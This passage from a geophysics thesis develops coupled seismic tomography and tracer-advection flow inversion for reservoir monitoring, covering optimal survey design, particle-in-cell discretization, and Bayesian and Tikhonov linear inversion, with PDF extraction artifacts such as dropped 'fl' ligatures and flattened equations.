owmodels, with promising results (Cockett and Haber, 2016; Hoversten et al., 2006;Steklova and Haber, 2015). These approaches are di\u000berent in that they were developedfor speci\fc ow models, require Archie's law, are not solved iteratively, and havespeci\fcally tailored regularization terms. Additionally, the inversions are carried outfor all times, therefore incorporating all historic data in one inversion.In light of current reservoir monitoring practice, there is room to improve up-on coupled geophysical imaging and subsurface ow inversion methods for reservoirmonitoring.91.3. Optimal survey designIn addition to coupling geophysical survey methods to estimate ow model param-eters, there is reason to consider optimizing the geophysical survey design to adaptto the ow dynamics, such that the best estimates of the reservoir parameters areobtained from a coupled inversion.1.3 Optimal survey designWhile the coupled ow and geophysical inverse problem can potentially provide betterestimates of reservoir parameter functions through inversion of large geophysical datasets, the geophysical data collection can also be designed in an optimal way. Forexample, if one is interested in monitoring the progression of a uid front as it movesthrough a reservoir, collecting geophysical data far downstream may not contributeany additional information to the inversion, and thus those measurements could beexcluded. In the context of reservoir monitoring, an optimal experimental designmight amount to adding or eliminating a well location as demonstrated by Gharamtiet al. (2015), or reducing the number of surface measurements from a maximumallowable set.In many realistic scenarios, the ow dynamics are su\u000eciently slow to allow forimproved designs after a \frst experiment has been conducted. This is particularly truewhen monitoring ow in reservoirs where uid velocities can be so slow that changesoccur over months or even years (Vasco et al., 2004). Additionally, the availablehistoric experimental data and inversion results will contain valuable informationabout the subsurface. This information should thus be included when determiningan optimal survey design for a future survey.The mathematical method of determining an experimental design is known asoptimal experimental design (OED), and has existed for some time for both the well-posed and ill-posed parameter estimation cases (Aggarwal et al., 2015; Ajo-Franklin,101.3. Optimal survey design2009; Atkinson and Donev, 1992; Bardow, 2008; Chaloner and Verdinelli, 1995; Curtis,1999; Fedorov, 1972; Haber et al., 2008, 2010, 2011; Huan and Marzouk, 2013; Lucero,2013; Pukelsheim and Studden, 1993).Typically, optimal experimental designs are computed by minimizing the error inthe estimated parameter model according to some speci\fed criteria. In this case themodel estimate is assumed to be the mean of a distribution with a covariance matrixcharacterizing the error. The type of design method depends on the optimality criteriaapplied to the covariance matrix. There are several standard optimality criteria; forexample, A-optimal design minimizes the trace of the covariance matrix or averagevariance, D-optimality minimizes the determinant of the covariance matrix, and E-optimality minimizes the eigenvalues of the inverse covariance matrix.There are some optimal design methods which consider dynamic systems, yetthere is little in the way of optimal design algorithms for ill-posed inverse problemswhere the model is governed by a dynamical system. Although there has been workon sequential design for the well-posed case, no work is known for the ill-posed case,(see the following for examples: (Cherno\u000b, 1972; Khodja et al., 2010; Papalambrosand Wilde, 2000; Wilkinson et al., 2015) and references within). In some cases,static design methods can be applied to time dependent partial di\u000berential equations(PDEs) (Alexanderian et al., 2014; Haber et al., 2011), this approach results in ana-priori estimate of the designs for \\all times\" which depend only on informationprovided in the form of a regularization (or prior) to the ill-posed problem. Forexample, (Alexanderian et al., 2014) compute optimal designs for a tracer advection-di\u000busion reservoir model. This example however, did not include any geophysicalimaging, nor was any historic data included in the experimental design computation.There has been some work applying optimal design methods to the Kalman \fl-ter (Gharamti et al., 2015; Sagnol and Harman, 2014); for example, Sagnol and Har-man (2014) propose a D-optimal design method for the Kalman \flter, which results111.4. Thesis objective and outlinein designs dependent on the posterior state estimation covariance matrix. Alter-nately, Gharamti et al. (2015) present an optimal method for selecting aquifer welllocations to track the ow of a contaminant plume. In both cases, the prior covariancematrix to be minimized includes the transition matrix (a discretization of the dynam-ics), but the designs still do not depend on historic data, and thus these approachesare no di\u000berent then the application of static methods.In fact, as far as can be discerned from the literature, apart from sequentialdesign approaches (Cherno\u000b, 1972; Khodja et al., 2010), which use the posterior modelestimate and its posterior covariance as the prior for the design at the next time step,current design techniques for linear inverse problems do not utilize information thatis collected at early times in order to design experiments at later times. This is aconsequence of optimizing over the posterior variance in the model estimates.For any linear ill-posed inverse problem, static or dynamic, the posterior covari-ance matrix will only depend on the physics of the problem, and the linear regulariza-tion operator (or prior distribution covariance matrix for the Bayesian perspective),regardless of how the inverse problem is formulated. Thus, in order to include historicdata to a standard optimal design problem, the posterior covariance matrix must bereconsidered.1.4 Thesis objective and outlineThe main objective of the research presented in this thesis is to improve reservoir mon-itoring and forecasting by coupling geophysical survey techniques with a dynamic uidow reservoir model and optimally designing the data collection in the geophysicalsurvey.Coupling the geophysics and ow model in one inverse problem allows for theestimation of uid parameter functions such as the permeability k(~x) from geophysical121.4. Thesis objective and outlinedata. To address the coupling problem, careful consideration of the choice of thereservoir uid ow model and its discretization is taken such that knowledge of thephysical parameter relationship is not necessary. Additionally, error in the reservoirmodel is assumed to be zero. This is contrary to the usual assumptions. In this way,the geophysical inversion problem will be reformulated as an ill-posed inverse problemwith appropriate regularization terms that is constrained by the uid ow model.Since the geophysical survey provides a much denser sampling of data, the uncertaintyin the recovered ow model parameter function is reduced and thus provides betteraccuracy when forecasting ow.Optimally designing the geophysical survey for the coupled problem, while in-cluding historic survey data, produces a survey that adapts with the dynamics of thereservoir while reducing the number of measurements required. This research buildson A-optimal sparsity constrained design algorithms presented in (Haber et al., 2011)for large-scale ill-posed inverse problems, by introducing a monitor function to thedesign optimization problem to include historic data.The main body of the thesis consists of \fve chapters. Since the same geophysicalsurvey and ow model are used to demonstrate the ideas in the proposed research,the thesis \frst outlines these models, and then presents the new ideas.To this end, Chapter 2 introduces the seismic tomography geophysical imagingsurvey and the tracer advection ow model chosen to represent a simpli\fed reservoirmonitoring scenario, presents a mathematical argument for not requiring a physicalproperty relationship between models, and details the discretization of the two modelPDEs.Chapter 3 outlines the decoupled linear inversion process and discusses the issueswith coupling the two di\u000bering physical models. In particular, consideration mustbe taken when characterizing the error in each of the models, as this leads to very131.4. Thesis objective and outlinedi\u000berent formulations of the coupled inverse problems.Chapter 4 presents the seismic tomography tracer advection coupled inverse prob-lem formulated to solve for the uid velocity \feld and initial tracer concentrationwithin the reservoir. Because of the ill-posed nature of the problem, special consid-eration of the regularization terms required to solve the problem are discussed. Inparticular this chapter highlights the construction of a unique regularization functionfor the uid velocity \feld. Due to the non-linearity of the regularization functions,solutions to the inverse problem are not so straightforward. This chapter thereforedetails the discretization of the regularization and optimization of the inverse prob-lems, and \fnally presents results for the tomography tracer advection model. Theobjective of the example is to show that estimates of the initial tracer distributionand uid velocity \feld are improved as new geophysical data are obtained, and thatforecasting improves as a consequence.Chapter 5 details the formulation of the adaptive A-optimal experimental designmethod for two cases of the error characterization in the dynamic uid ow model.The new formulation proposes the addition of a monitor function in the de\fnitionof the posterior covariance matrix of the estimated model parameters. The non-linearity of the resulting optimization problem requires iterative solution techniques,which are outlined in Section 5.3. The adaptive design method is then demonstratedfor the coupled seismic tomography tracer advection reservoir monitoring example forboth cases of the error characterization. The results show that experimental designscomputed using this method adapt to the ow within the reservoir while still providingsu\u000ecient data for optimal recovery of tracer distributions.Chapter 6 summarizes the key \fndings of the research presented in this thesis,discusses the practical contributions, and comments on areas of future work.14Chapter 2A model reservoir monitoringexperimentTo demonstrate the research ideas presented in this thesis a simple model of a reservoirmonitoring scenario is used throughout. The model consists of a seismic tomographysurvey to image the reservoir, and a tracer advection ow model to characterize thesubsurface uid ow dynamics.Although there are several choices when considering geophysical surveys for moni-toring subsurface ow, such as gravity surveys or electrical methods, borehole seismictomography surveys provide a good starting point for monitoring a reservoir. Inparticular, the tomography survey utilizes already existing boreholes for source andreceiver locations, while receivers can be placed on the surface to expand the mea-surement area. It has also been established that seismic wave velocity is sensitive tochanges in rock uid properties (Alumbaugh and Morrison, 1995; Nolet, 1987; Oliverand Chen, 2010), and thus the data are sensitive to ow. An additional bene\ft isthe linearity of the governing equations. The measured tomography data are a linearmapping of the subsurface rocks seismic properties, which can be inverted to recovera spatial image of the properties. Thus imaging the seismic wave velocity involvessolving a fairly straightforward linear inverse problem.There are several well established and researched models describing ow within areservoir, such as two-phase ow models or a black oil model, among many others.15Chapter 2. A model reservoir monitoring experimentSee (Chen et al., 2006) for an excellent outline of ow models. However, many of thesemodels are complicated and can be discretized with a limited number of techniqueswith time step and spatial discretization length restrictions. Since the goal is tocouple the ow model and the geophysical model to form an already computationallyexpensive ill-posed inverse problem, it is not bene\fcial at this stage of proof of conceptto incorporate more physically accurate, and computationally di\u000ecult models.Although the tracer advection model might seem like an unlikely choice for sim-ulating ow within a reservoir, there is some justi\fcation; the tracer itself can bethought of as an analogy to the second phase (a di\u000bering uid than the alreadypresent uid) moving in a reservoir and mathematically resembles two-phase owmodels (Chen et al., 2006). In reality, the tracer advection model is a single phaseow model. Also, at very long time scales, where an injected uid front might takemonths to move even a few meters, it is not necessary for the purposes of this researchto incorporate a model that characterizes minute changes. Additionally, in hydrolo-gy, tracer experiments are common practice for estimating aquifer parameters such ashydraulic conductivity, and have been used in conjunction with seismic tomographysurveys in the past (Hyndman et al., 1994).Practically, from a computational perspective, the tracer advection models lin-earity lends itself to a variety of discretization techniques, including unconditionallystable Lagrangian particle in cell methods. A second bene\ft becomes clear in Sec-tion 2.3 when discussing physical parameter relationships and coupling the ow modelwith the geophysical imaging.This chapter introduces the governing partial di\u000berential equations (PDEs) for thetomography survey experiment and tracer advection model, discusses the relationshipbetween the di\u000berent physical properties of the two PDEs, and \fnally presents adiscretization of the resulting governing system of equations.162.1. Geophysics: seismic tomography2.1 Geophysics: seismic tomographyClassical travel time tomography uses ray paths to model travel times and so assumesthat the data are of high frequency, meaning the wavelength is at least several timessmaller than the spatial variations of the velocity model (Yilmaz, 2013).A typical 2D seismic tomography experiment places nssources on one side of theregion to be imaged and nrreceivers on the other. Travel times of an acoustic wavetraveling from source to receiver constitute the measured data, where the ultimate goalis to recover an image of changes to the distribution of physical properties generatingchanges in these data. A schematic of the seismic experiment is illustrated in Fig. 2.1.Figure 2.1: Tomography setting: sources (si) and receivers (rj) are placed in twoboreholes and the travel times of an acoustic wave traveling along adjoining ray paths(i;j) are measured.Mathematically, the travel time data are calculated by integrating the inverse ofthe acoustic wave velocity, also know as the slowness, m(t;~x), over a ray path i;j.172.2. Dynamics: tracer advectionThe travel time along the ray path from the ith source to the jth receiver is given bydi;j(t) =Zi;jm(t;~x) d`: (2.1)where m 2 M is the slowness model belonging to the subspace, M. Assuming alayered earth with homogeneous isotropic porous rock layers, then the ray paths thewaves follow will be linear and independent of the slowness (this is true for smallperturbations in the slowness \feld). Thus, the problem can be cast as a linear inverseproblem for m(t;~x) (Jones, 2010).Given noisy data vectors d(t) measured at times (t0; : : : ; tn) Equation (2.1) canbe written as,Fm(tk;~x) + \u000fk= d(tk); (2.2)where d is a ns\u0002 nrvector of real numbers, F :M! Rns\u0002nris the forward mappingoperator, and measurement error \u000fk. The receivers, or modern seismometers, measuretiny displacements in the earth. These instruments use electronic sensors, ampli\fers,and recording devices, which can cover a wide range of frequencies. In general, the\frst arrival time and initial displacement of earth is measured successively manytimes over a very short interval and stacked such that the measurement is given as acontinuous random variable, with error \u000fi;j\u0006 ffi;j.2.2 Dynamics: tracer advectionThe tracer advection equations as presented in (Chen et al., 2006), describe the trans-port of a solute in a fully saturated uid phase with the assumption that uxes dueto dispersion and di\u000busion are small relative to the advective transport of the so-lute. The motion of a tracer with conserved concentration c (volumetric fraction in182.2. Dynamics: tracer advectionthe uid phase), in a uid of density \u001a(t;~x), with spatial and temporal variables~x; trespectively, is described by the following relation,@(c\u001a)@t+r \u0001 c\u001a~u = 0; (2.3a)s.t. c\u001a(0;~x) = c0\u001a(~x);where the ow \feld~u satis\fesr \u0001~u = q; (2.3b)~u = K(~x)rp; (2.3c)p(0;~x) = p0(~x): (2.3d)accompanied with either Dirichlet or Neumann boundary conditions for the pressure,p. The uid velocity \feld~u is determined by Darcy ow in this approximation, whereonly the hydraulic conductivityK = k(~x)=\u0016, a function of the permeability k and uidviscosity \u0016, and pressure gradient describe the ow \feld. Recalling Equations (1.1b),the gravitational term has been excluded on the assumption that it is very small incomparison to the pressure gradient. This implies that pumping rates are high enoughto generate signi\fcant pressure within the reservoir. Note that Equation (2.3b) impliesthat what ows in ows out within the entire domain, such that the source pumpingrate in is equal to the pumping rate out, qin= qout). Thus the rock is assumed to beincompressible, such that no uid is stored. The tracer advection model is illustratedin Figure 2.2.In a typical reservoir characterization setting one would collect pressure and con-centration measurements and invert these data to recover K(~x). However, assumingthe presence of the tracer generates a change in the seismic wave velocity, then the ideais to \frst estimate u, and later estimate K. To do this, the petrophysical parameter192.3. Physical parameter relationsFigure 2.2: Tracer advection: Tracer of concentration (c) is advected in a uid ofdensity (\u001a) with velocity \feld (~u). The hydraulic conductivity (K) determines thevelocity \feld given a pressure gradient within the reservoir.relationship between c(~x)\u001a and the seismic slowness m(t;~x) must be considered.2.3 Physical parameter relationsIn order to use geophysical techniques to estimate uid ow parameters through in-version of geophysical data, there must be a relationship between the ow parametersand the geophysical rock properties, also known as a petrophysical relationship. Onefamous petrophysical function, known as Archie's law, relates the electrical conduc-tivity of a sedimentary rock to its porosity and brine saturation (Archie, 1942). Inthis way, changes in saturation will result in changes to the electrical conductivity, aproperty that governs the ow of electric current in the presence of an electric \feld.However, Archie's law is an empirical relation that is site dependent and requiressigni\fcant laboratory work which cannot be generated for the general case (Archie,202.3. Physical parameter relations1942; Gosselin et al., 2003). Many empirical relations between seismic velocities androck porosity have also been developed (Abul, 2010; Mavko et al., 2009). However,these are also rock and site speci\fc, and are often highly nonlinear.For the seismic tomography experiment it may be that in the presence of thetracer, the seismic slowness changes relative to areas where there is tracer present.Thus, it is assumed that the tracer c^ = c\u001a and the seismic slowness m are related suchthat petrophysical relationship m(c^) exists, however, given the choice of ow modelit is not necessary to know m(c^).To see this consider the case where the ow is divergence free such that r\u0001~u = 0.The uid velocity model, Equation (2.3b), typically has a very sparse right hand sidewith delta functions for injection and extraction points. Therefore, the ow \feld isdivergence free almost everywhere within the reservoir.Recalling Equation (2.3a), the equation describing the advection of the tracer is@(c^)@t+r \u0001 c^~u = 0:Now, assuming that the only source of change to the subsurface rock comes from thetransport of the tracer, then the \\transport\" of the seismic slowness is governed bythe same conservation law as follows,@m(c^)@t+r \u0001 (m(c^)~u);applying the chain rule to the \frst term and expanding the divergence term yields,@m(c^)@c^@c@t+~u>rm(c^) + c^r \u0001~u:212.4. DiscretizationExpanding the gradient term and recalling the assumption r \u0001~u = 0 gives,@m(c^)@c^@c@t+~u>@m(c^)@c^rc^;and \fnally factoring out@m(c^)@c^while recalling that Equation (2.3a) is equal to zero,@m(c^)@c^\u0012@c^@t+~u>rc^\u0013=@m(c^)@c^(0) = 0Thus, it can be assumed from this result that the transport equation describingthe ow of the tracer can also be used for the \\transport\" of the slowness. Thisfeature of the tracer advection model is particularly advantageous as it eliminates thenecessity of knowing the petrophysical relationship between the tracer and seismicvelocity.Given the two models, the discretization is now outlined in the following sections.2.4 DiscretizationThe numerical discretization of the geophysical imaging and the ow dynamics ispresented in three parts: the discretization of the tomography experiment (Equa-tion (2.2)), the tracer advection (Equation (2.3a)), and the uid conservation law(Equation (2.3b)).For simplicity, the discretization is restricted to a two-dimensional setting wherethe computational domain = [0; L1]\u0002 [0; L2] is rectangular, and divided into l1byl2rectangular cells of edge length h1= L1=l1and h2= L2=l2.2.4.1 Discretization of the tomography equationTo discretize the tomography experiment with discrete data dkmeasured at time k =1; : : : ; n the line integrals in (2.1) are approximated by summing over line segments222.4. Discretizationdlk. That is, the approximation of the integral in Equation 2.1 for the travel time di;jof a wave traveling along the ray path i;jbetween the ithsource and the jthreceiverisdi;j=Zi;jm(t;~x)dl \u0019pXk=1mkdlk;where p is the number of cells that i;jintersects in the mesh, mkis the value of theslowness at the cell center of the kthcell, and dlkare the line segments of i;jpassingthrough each cell respectively.Thus, the discrete tomography experiment can be written as a linear systemFmk+ \u000fk= dk; k = 1; : : : ; n; (2.4)where the entry of Fijis the length dlkof the intersection of i;jthrough the kth cell.The cell centered values of the grid are stored in the vector m.The operator F : RM! RN, maps from the model space to the data spaceN = ns \u0002 nr (number of sources \u0002 number of receivers), and thus dkis an N \u0002 1vector of discrete travel time measurements, and m is an M \u0002 1 vector of seismicslowness values with units s=m.2.4.2 Discretization of the mass balanceSince vector operators such as the curl and divergence will be used later, a Marker andCell (MAC) (Fletcher, 2012) grid is chosen for the discretization of the uid velocityvector \feld~u and the initial seismic slowness m0. The MAC method is discretizedon an Eulerian staggered grid system, and is a \fnite di\u000berence solution technique forinvestigating the dynamics of an incompressible viscous uid. One key feature is theuse of Lagrangian virtual particles, whose coordinates are stored, and which move232.4. Discretizationmju+1u1u+2u2Figure 2.3: A grid cell with length h1and height h2, slowness value (mj) located atthe cell center, and components of the uid velocity owing in (~u = [u+1; u+2]) and out(~u = [u1; u2]) on the cell edges.from a cell to the next according to the latest computed velocity \feld (McKee et al.,2008).Figure 2.3 pictures a cell in the grid where~u = [u1; u2] is discretized on the cellfaces, and m at the cell centers using a cell-centered grid function m0. This yields anapproximation of the divergence in the cell-centers using short di\u000berences.2.4.3 Discretization of the ux-balance conservationA \fnite volume discretization of the ux-balance equation r \u0001~u = q on a staggeredgrid is obtained by using the divergence theorem;ZVcellr \u0001~u dV =ZScell~u \u0001~n dS;where, Vcellis the volume of the cell, and Scellis the cell surface area. The vector~nis the unit normal vector to the surface. See (Haber and Ascher, 2001) for furtherdetails.Referring to Figure 2.3, the divergence over a cell with dimensions of h1\u0002 h2in242.4. Discretizationthe mesh can be expressed as(r \u0001~u)cell\u0019h2(u1 u+1) + h1(u2 u+2)h1h2;where the u+iis the magnitude the ux into the cell and uiis the magnitude ofthe ux out of the cell in ith coordinate direction. This discretization leads to thefollowing standard discretization of the divergenceDIV u = q; where DIV =\u0012Il2dl1l1+1dl2l2+1Il1\u0013; (2.5)whereis the matrix Kronecker product, Il2 Rl\u0002ldenotes the identity matrix, l isthe number of cells in a respective direction, and where dll+12 Rl\u0002l+1is a short \fnitedi\u000berence matrix; see (Modersitzki, 2009) for more details about the implementation.The discrete divergence operator maps from faces of the mesh to cell-centers.2.4.4 A Particle-In-Cell method for ow simulationThe tracer advection equation (Equation (2.3a)) can be discretized in a number ofways. One option is to use explicit Eulerian techniques such as up-winding, Lax-Wendro\u000b or Lax-Friedrichs (Ascher et al., 2006). However, explicit techniques su\u000berfrom one main shortcoming; since the velocity of the equation is unknown, one has tomonitor the time step making sure stability is maintained. Monitoring and adjustingthe time step can add enormous complexity to the optimization technique used if at-tempting to estimate the velocity. Methods such as up-winding and other ux limitershave another shortcoming; they are not di\u000berentiable with respect to the velocity andtherefore simple optimization techniques can run into di\u000eculties. Alternately, onehas the option of using implicit methods which require the solution of linear systemsat every time step, or using semi-Lagrangian techniques.252.4. DiscretizationSemi-Lagrangian techniques are particularly attractive for this application as theyare explicit, unconditionally stable, and can be easily made di\u000berentiable. Semi-Lagrangian methods can su\u000ber from low accuracy, however for this application wherethe velocity \feld is approximated and thus inaccurate, working with highly accuratediscretizations is usually computationally wasteful. Therefore a Particle-In-Cell (PIC)method, that can also be interpreted as a semi-Lagrangian technique, is applied forthe discretization.The idea of using PIC methods for the solution of conservation laws is not new andwas proposed in Evans and Harlow (1957). Recently, PIC methods have emerged incomputer graphics (Edwards and Bridson, 2012) and in ow in porous media (Roubi-net et al., 2013).To use PIC methods, a particle xjis associated with the midpoint of the jth gridcell. The particle is assigned a value mj= m0(~xj), and the advection of the particlexjis described by the following ordinary di\u000berential equation (ODE)@xj(t)@t=~u(x): (2.6)Using a midpoint quadrature rule, the particles position after the \frst time step isapproximated byxj(t1) = xj(0) + \u0001t(Acfu)j+O(\u0001t2); (2.7)where Acfdenotes an averaging operator from cell faces (where the velocity resides)to cell centers. Thus, the position of the particle at a later time is easily computedgiven a time step and velocity \feld. Since the new position will in general not be themid-point of a cell, the value mjis distributed to the closest surrounding points asillustrated in Figure 2.4. To compute the distribution weights, bilinear basis functions(bilinear interpolation) were used, however, higher order interpolation techniques canand have been applied (Edwards and Bridson, 2012). Thus, the slowness \feld mkat262.4. Discretization~xA~xB~u\u0001tFigure 2.4: Particle-In-Cell method for the advection and mass-conservation equation.A particle located in the cell-centered point~xAon the regular mesh is pushed forwardwith velocity~u along the path~u\u0001t, to the non-grid point~xB. The value (mass)associated with the particle is then transferred to the cell centered grid points adjacentto~xBusing interpolation weights.272.5. Summarytime tk= tk1+\u0001t is given bymk= T(\u0001tu)mk1; (2.8)where T(\u0001tu) denotes the push-forward matrix containing the values of the bilinearhat functions associated with the particles at the grid points. Since the value ofeach particle is spread between neighboring cell-centers, this construction guaranteesexact mass preservation as long as no ux exits at the boundaries of the computationaldomain. Using the push forward matrix, the time-stepping process is thenmk= T(\u0001tu)mk1= Tkm0: (2.9)The slowness at the kthtime step is therefore a pushed-forward version of m0, wherethe path the particle takes is piece-wise linear.2.5 SummaryThis chapter presented the physical models selected to represent the geophysical imag-ing survey and tracer advection uid ow model for the reservoir monitoring experi-ment, discussed the relationship between the model physical properties, and detailedthe discretization.One novel and important result of the tracer advection model was discussed inSection 2.3, is that under certain conditions the \\motion\" of the seismic slownessis governed by the advection model. This result eliminates the need to know thepetrophysical relationship between the tracer and the slowness, and will be bene\fcialwhen formulating the coupled inverse problems later in Chapters 3 and 4.In addition, the discretization of the physical models was detailed, and in particu-lar, an explicit unconditionally stable Lagrangian technique was applied to discretize282.5. Summarythe tracer advection equation. Because the method is explicit and unconditionallystable, it will not add additional complexity to the inverse problems to be proposed.29Chapter 3Error characterization andmodel estimationEstimating either the seismic slowness, or the uid ow parameter functions and lateroptimally designing the geophysical survey requires the solution of an inverse problem.Before formulating the coupled inverse problem to estimate ow parameters, anddeveloping an optimal experimental design method, it is important to understand thebasis of a linear inverse problem from both the Bayesian and frequentist perspectives,and additionally, how the characterization of the error in the dynamic ow modele\u000bects the formulations. The main goal of this thesis is to give the reader a quickbackground in linear inverse theory in preparation for the inverse problem developedin Chapter 4, and the adaptive optimal experimental design method developed inChapter 5.This chapter \frst presents a brief review of Bayesian linear inversion and itsrelationship to frequentist linear inversion, followed by two formulations of a coupledinverse problem that assumes knowledge of the velocity \feld~u, for the case wherethere is no noise in the ow model, and the case where there is random noise.3.1 Linear inversionThe process of inferring model parameters from a set of noisy observations is com-monly known as inversion, or parameter estimation. In this context it is assumed303.1. Linear inversionthat given a physical model and model parameters, observation data can be simulat-ed by solving the forward problem. Thus, if one has some real observation data, thenan estimate of the model parameters can be obtained by minimizing the di\u000berencebetween simulated data (predicted data) and the observations.Inverse problems can be thought of as statistical estimation problems that canbe studied from both Bayesian and frequentist perspectives (Biegler et al., 2011; S-tark and Tenorio, 2010). In either case, a stochastic model for the data is requiredand constraints on the unknown model parameters can be incorporated. The majordi\u000berence in the two perspectives is that Bayesian methods require that constraintsbe formulated as a prior probability distribution, whereas the frequentist method-ology does not. An important well known observation worth noting, is that for alinear Tikhonov regularized inverse problem, with some simple assumptions, the twomethodologies reduce to an equivalent problem. This result becomes important whenlater in Chapter 5 when the adaptive optimal experimental design of the ill-posedcoupled problem is examined.To begin a basic review of inversion, consider the dynamic process and measure-ment technique described by the following set of discrete linear equations describingthe tracer advection (Equation (3.1a)), and the seismic tomography (Equation (3.1b)),presented in Chapter 2,mk= Tmk1+ \u0011k; (3.1a)dk= Fmk+ \u000fk; (3.1b)where the noise vectors \u0011kand \u000fkare assumed to be Gaussian normal, \u0011k\u0018 N(0;Qk)and \u000fk\u0018 N(0;W1k). If the noise \u000f is uncorrelated, then the matrixW is a diagonalmatrix with entries wi= 1=ff2i, where ffiis the standard deviation of \u000fiaway from313.1. Linear inversionzero.Assuming for the time being that the goal is to recover only the geophysical modelproperties given geophysical data without consideration of the dynamics, then thegeophysical properties, or slowness m for the tomography experiment, given traveltime data set d, can be estimated by maximizing the Bayesian posterior likelihood ofm given d, which is proportional to the product of the probability of the data giventhe model, and the model likelihood:P (mjd) \u0018 P (djm)P (m);where m is a random variable with Gaussian prior distribution m \u0018 N(\u0016;\u0006). Thusthe probability of the model given the data is,P (mjd) / exp (12(Fm d)>W(Fm d)) exp (12(m \u0016)>\u00061(m \u0016)):Taking the negative log yields,ln(P (mjd)) /12(Fm d)>W(Fm d) +12(m \u0016)>\u00061(m \u0016);and minimizing with respect to m givesF>W(Fm+ d) +\u00061(m \u0016) = 0:Finally, solving for m, yields the maximum a-posterior estimate (MAP estimate)bm = (F>WF+\u00061)1(F>Wd+\u00061\u0016):Alternately, a common linear inverse problem for estimating the geophysical pa-323.1. Linear inversionrameters m from the frequentist perspective is given by the following regularizedTikhonov inverse problem (Hansen, 1998; Tikhonov and Arsenin, 1977),minm12kFm dk2+12\u000b kL(mmp)k2: (3.2)The \frst term in Equation (3.2) penalizes the di\u000berence between the simulated da-ta and measured data, and the second term (the regularization term) is chosen topromote smoothness between the estimated model and a reference model m0. Theregularization term improves the convexity of the inverse problem as it is ill-posed inthe classical sense; without it solutions will \ft the measurement noise and are thusmeaningless.The choice of regularization is an interesting problem in itself, and is usuallyproblem speci\fc. There is much research in the area of optimally selecting and con-structing regularization functionals, particularly in medical imaging (Hansen, 1998;Huang et al., 2012). Later, when developing the coupled inverse problem, speci\fccare will be taken in constructing an appropriate regularization functional for reser-voir parameter estimation.Minimizing Equation (3.2) yieldsbm = (F>F+ \u000bL>L)1(F>d+ \u000bL>Lmp):Note that if L>L = \u00061,W = 1=\u000bI, and mpis considered the prior mean, then thetwo problems are equivalent.This well known fact will allow for the application of Bayesian optimal experimen-tal design techniques to coupled inverse problems with linear regularization terms laterdiscussed in Chapter 5.However, in order to couple the Equations (3.1) to form a single inverse problem,333.2. Coupled inversion and error characterizationthe error \u0011kin the dynamic model must be considered.3.2 Coupled inversion and error characterizationBefore combining Equations (3.1a) and (3.1b) there are two instances of the noise inthe dynamics that must be addressed which result in di\u000berent coupled inverse problemformulations.Assume \frst that the dynamics are exact, that is \u0011k= 0; 8 k. Such a scenario isoften assumed in history matching (Oliver and Chen, 2010). In this case the dynamicsare determined by the initial model m0, and estimated using the measurements forall times. The second instance refers to the case that \u0011k6= 0, and therefore modelsm1; : : : ;mkfor all times are estimated from all available data.3.2.1 Exact dynamicsSetting \u0011k= 0 and assuming the velocity \feld u is known, the model at time tkcanbe written as a linear mapping of the initial model m0, such thatmk= T(\u0001tu)mk1; or mk= T(\u0001tu)km0; (3.3)which can be written as the following linear system,0BBBBBBBBBB@IT(\u0001tu) IT(\u0001tu) I......T(\u0001tu) I1CCCCCCCCCCA| {z }=:A(u)[email protected]| {z }=:m+0BBBBBBBBBB@T(\u0001tu)00...01CCCCCCCCCCA| {z }=:B(u)m0= 0:(3.4)343.2. Coupled inversion and error characterizationIn compact form the system is given byA(u)m+B(u)m0= 0:Thus it is possible to write the time evolution of the initial model m0in terms of thefuture models and the dynamics, such thatm = A(u)1B(u)m0: (3.5)The data measurements at each time are then given bydk= Fkm0+ \u000fk; (3.6)where Fk= FTk, and for the large system for all times,d = (IF)A(u)1B(u)m0+\u0016\u000f; (3.7)whereis the matrix Kronecker product, d = [d1; ::dk]>and\u0016\u000f = [\u000f1; ::\u000fk]>.The coupled linear Tikhonov inverse problem to estimate m0, assuming that thedynamics are known, is thenminm012(IF)A(u)1B(u)m0 dobs2+12\u000b kLm0k2: (3.8)The case where the parameters governing the dynamics are unknown, that is, thereservoir parameters and velocity \feld are to be estimated, again results in a di\u000berentformulation of the inverse problem. A new formulation for estimating these modelsis presented in Chapter 4.353.2. Coupled inversion and error characterization3.2.2 Inexact dynamicsTo address the case where the dynamics are inexact the geophysical imaging and thetracer advection of m0are written for all timesFm0 d0= \u000f0;Fm1 d1= \u000f1; m1Tm0= \u00111;......Fmk dk= \u000fk; mkTmk1= \u0011k:(3.9)Collecting all equations in matrix form results in the following system,[email protected]@[email protected]=0BBBB@\u000f0...\u000fk1CCCCA; (3.10)0BBBB@T I......T [email protected]=0BBBB@\u00110...\u0011k1CCCCA:De\fning the transport matrix T for all times asT =0BBBB@T I......T I1CCCCA;mk= (m>0; : : : ;m>k)>, d = (d>0; : : : ;d>k)>, \u000f = (\u000f>0; : : : ; \u000f>k)>, and \u0011 = (\u0011>0; : : : ;\u0011>k)>the compact system is363.3. Summaryd = (IF)m+ \u000f; (3.11)Tm = \u0011: (3.12)Assuming again that the velocity \feld u is known, the most recent model mkisestimated by solving the following regularized minimization problem which includesall historic data and model estimates m0; :::mk1,bmk= argmin12\u0010(IF)mk dk\u00112Wk+12T mk2Q1k(3.13)+\u000b2k(IL)mkk22:A second option is to re-estimate all models given all current data. This is akin tominimizing over mk. Writing the problem in this way, where the inverse problemminimizing both error vectors, is also known as Kalman smoothing (Aravkin, 2010;Evensen, 1994).3.3 SummaryThis chapter provides a brief review of linear inverse theory from both the Bayesianand frequentist perspectives, highlights the relationship between the two methodolo-gies for linear problems, and discusses the error characterization in the dynamic owmodel.Given the exact and inexact noise considerations presented, the main questions ofthe thesis can now be addressed. Chapter 4 considers the exact case and presents theformulation of the inverse problem for estimating both the initial state of the dynamicmodel, m0and the velocity \feld~u. Chapter 5 presents a new optimal design method373.3. Summarydeveloped from the Bayesian perspective for the frequentist coupled inverse problem.The design method is presented for both exact and inexact noise realizations in thedynamic ow model.38Chapter 4Coupled inversion for velocityand initial slownessIn many cases in reservoir characterization, it is the hydraulic conductivity K that issought in order forecast ow. For the tracer advection model, one might argue thatthis is not necessary, and that it may be a simpler problem to estimate the velocity\feld u. In particular, once the velocity \feld is known, and given an estimate of theinitial slowness, the ow can be predicted by marching the forward in time. This isthe motivation for the approach detailed here.Whereas the previous chapter outlined a method for estimating the initial slownessm0given seismic travel time data while the velocity \feld is assumed to be known,this chapter highlights a novel approach for estimating both m0and the velocity\feld u from seismic tomography data, through a coupled inverse problem. Thisformulation assumes that there is no error in the dynamic ow model. That is,mk= T(u)mk1+ \u0011k, where \u0011k= 0.The mathematical formulation developed in this chapter is similar to that of Sec-tion 3.2.1, with the exception that the velocity \feld is unknown. The resulting param-eter estimation problem is posed as a ow constrained inverse problem with speci\f-cally tailored 